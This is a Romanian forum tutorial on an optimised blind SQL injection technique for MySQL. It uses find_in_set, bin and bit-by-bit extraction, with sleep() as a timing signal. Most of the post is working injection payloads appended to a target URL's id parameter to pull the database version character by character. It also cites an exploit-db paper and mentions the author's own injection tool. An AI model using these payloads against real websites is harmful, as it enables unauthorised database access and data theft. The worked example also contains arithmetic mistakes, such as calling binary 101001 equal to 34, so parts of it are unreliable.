Jump to content
dancezar

Mysql blind (True/False) bit shifting

By dancezar, in Tutoriale in romana

Recommended Posts

  • Active Members
dancezar Newbie

dancezar

Posted
  • Active Members
Posted (edited)

Metoda este "descoperita" de Jelmer de Hen si presupune extragerea datelor prin blind based intr-o maniera mult mai optimizata.

Metoda prin bit shifting este optimizata pentru a extrage o litera ditr-un sir cu doar 8 requesturi,pentru un dictionar de 45 de caractere.

Query-ul este acesta :


[COLOR="#FF0000"]and if((select @c:=(mid(bin(find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')),1,1)))='',sleep(10),@c)+--+[/COLOR]

Cum functineaza aceasta metoda?

Functia find_in_set primeste 2 parametri primul o litera sau un sir x de caractere iar al doilea un sir de caractere despartite prin virgula si v-a returna pozitia pe care se afla x in sirul de caractere despartite prin virgule.

Exemplu:

Pentru urmatorul query:select find_in_set('a',',b,c,a,z,') v-a returna 3 pentru ca litera a se afla pe pozitia 3 in sirul de caractere despartite prin virgula.

Segventa mid(@@version,1,1) v-a returna prima litera din @@version care poate fi 5 si daca vom schimba mid(@@version,2,1) ne v-a returna "." unind aceste doua caractere vom obtine 5. si asa mai departe.

Asta inseamna ca daca functia find_in_set ne furnizeaza pozitia exacta in sirul dictionar noi vom stii ce litera este.

Exemplu:select find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')

V-a returna 34 deci in real case ca sa ghicim prima litera din @@version vom proceda in felul urmator:


set.com/index.php?id=1 and find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')>0  -->rezultat pozitiv
set.com/index.php?id=1 and 
find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')>10  -->rezultat pozitiv
set.com/index.php?id=1 and 
find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')>20  -->rezultat pozitiv
set.com/index.php?id=1 and 
find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')>30  -->rezultat pozitiv
set.com/index.php?id=1 and 
find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')>40  -->rezultat negativ
set.com/index.php?id=1 and 
find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')=40  -->rezultat negativ
set.com/index.php?id=1 and 
find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')=39  -->rezultat negativ
set.com/index.php?id=1 and 
find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')=38  -->rezultat negativ
set.com/index.php?id=1 and 
find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')=37  -->rezultat negativ
set.com/index.php?id=1 and 
find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')=36  -->rezultat negativ
set.com/index.php?id=1 and 
find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')=35  -->rezultat negativ
set.com/index.php?id=1 and 
find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')=34  -->rezultat pozitiv-->aici ne oprim

Deci am aflat pozitia primei litere adica 34 iar in dictionar a 34 litera este 5 deci este corect.Dar am obtinut rezultatul in 11 requesturi dar putem foarte bine sa il inbunatatim.

Ultimul caracter din dictionarul nostru este $ si se alfa pe pozitia 41 daca vom converti acest numar in binar vom obtine 101001.Numarul are in total 6 cifre care ori este 1 ori este 0.Daca vom lua sa ghicim fiecare cifra din rezultatul nostru binar vom fi surprinsi ca in loc de 14 requesturi ca in metoda de mai sus vom obtine decat 6...:o De ce ?


site.com/index.php?id=1 and mid(bin(find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')),1,1)=1 --> obtinem un rezultat pozitiv inseamna ca primul bit este [COLOR="#FF0000"]1[/COLOR]
site.com/index.php?id=1 and mid(bin(find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')),2,1)=1 --> obtinem un rezultat negativ inseamna ca urmatorul bit este 0 [COLOR="#FF0000"]10[/COLOR]
site.com/index.php?id=1 and mid(bin(find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')),3,1)=1 --> obtinem un rezultat pozitiv inseamna ca urmatorul bit este 1 [COLOR="#FF0000"]101[/COLOR]
site.com/index.php?id=1 and mid(bin(find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')),4,1)=1 --> obtinem un rezultat negativ inseamna ca urmatorul bit este 0 [COLOR="#FF0000"]1010[/COLOR]
site.com/index.php?id=1 and mid(bin(find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')),5,1)=1 --> obtinem un rezultat negativ inseamna ca urmatorul bit este 0 [COLOR="#FF0000"]10100[/COLOR]
site.com/index.php?id=1 and mid(bin(find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')),6,1)=1 --> obtinem un rezultat pozitiv inseamna ca urmatorul bit este 01[COLOR="#FF0000"]101001[/COLOR]

Rezultatul v-a fi 101001 care in reprezentatie zecimala inseamna 34 acelasi rezultat ca mai sus dar numai in 6 requesturi.

Dar cum vom stii ca am ajuns la ultimul bit fara ca sa mai facem requesturi in plus?

Ne folosim de functia sleep(10) in momentul cand vom primi un rezultat null din seria de biti inseamna ca serverul v-a astepta 10 secunde si vom stii ca am ajuns la ultimul bit fara vreun request in plus.


[COLOR="#FF0000"]and if((select @c:=(mid(bin(find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')),1,1)))='',sleep(10),@c)+--+[/COLOR]

Diferenta la prima vedere nu este foarte mare dar am implementat acest algoritm pe programul meu de Mysql blind based de la RST POWER si am comparat rezultatele pe localhost.Algoritmul simplu cu ASCII a facut in total pentru un sir de 40 de caractere(un hash) ~450 de requesturi iar algoritmul cu bit shifting numai 260 deci.. aproape la jumatate.Am sa postez ultima versiune diseara impreuna cu algoritmul acesta implementat ,mai am putin de lucru pentru ca la mai multe requesturi consecutive primesc rezultate cu 1-2 litere scoase aiurea.

Sursa:http://www.exploit-db.com/papers/17073/

Edited by danyweb09
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...